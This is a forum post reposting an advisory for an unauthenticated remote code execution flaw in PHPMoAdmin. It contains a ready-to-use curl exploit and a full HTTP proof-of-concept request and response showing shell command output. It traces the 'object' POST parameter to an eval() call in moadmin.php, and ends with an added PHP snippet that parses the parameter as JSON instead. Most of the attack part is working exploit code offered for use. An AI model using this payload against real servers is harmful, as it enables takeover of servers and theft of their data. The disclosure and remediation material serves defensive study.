Aerosol Posted March 4, 2015

#######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | |  \| | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
#######################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sell this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .
drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php

1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787: if (self::$model->saveObject($_GET['collection'],$_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693: eval('$obj=' . $obj . ';'); //cast from string to array
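The root cause in the analysis above is that saveObject() hands the 'object' POST parameter to eval(). As an added example (not part of the original post and not phpMoAdmin's own code), here is one way to parse that parameter as data only. It assumes the client submits the document as JSON instead of PHP source, and parseObjectParam() is a hypothetical name.

```php
<?php
// Added example, not phpMoAdmin code. parseObjectParam() is a hypothetical name.
// Assumption: the client submits the document as JSON rather than PHP source.

/**
 * Turn the untrusted 'object' request parameter into an array without
 * executing it. Returns null for anything that is not a JSON object or array.
 */
function parseObjectParam($raw, $maxDepth = 32)
{
    if (!is_string($raw) || $raw === '') {
        return null;
    }
    // json_decode() only builds data structures; it cannot call functions.
    // The depth limit bounds nesting in attacker-supplied input.
    $decoded = json_decode($raw, true, $maxDepth);
    if (json_last_error() !== JSON_ERROR_NONE || !is_array($decoded)) {
        return null;
    }
    return $decoded;
}

// Before (moadmin.php line 693, as quoted in the post):
//     eval('$obj=' . $obj . ';');
// After (sketch of the same spot in saveObject()):
//     $obj = parseObjectParam($obj);
//     if ($obj === null) { return false; }

// Constructed inputs: a JSON document, the request body shown in the PoC,
// and a bare scalar that is valid JSON but not a document.
$samples = array(
    '{"name":"alice","tags":["a","b"]}',
    "1;system('id;ls -lha');exit",
    '1',
);
foreach ($samples as $raw) {
    $result = parseObjectParam($raw);
    echo str_pad($raw, 36), ' => ', ($result === null ? 'rejected' : 'accepted'), "\n";
}
```

The function uses json_last_error() rather than exceptions so that it also runs on the PHP 5.5 environment listed in the PoC.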
kp112 Posted March 5, 2015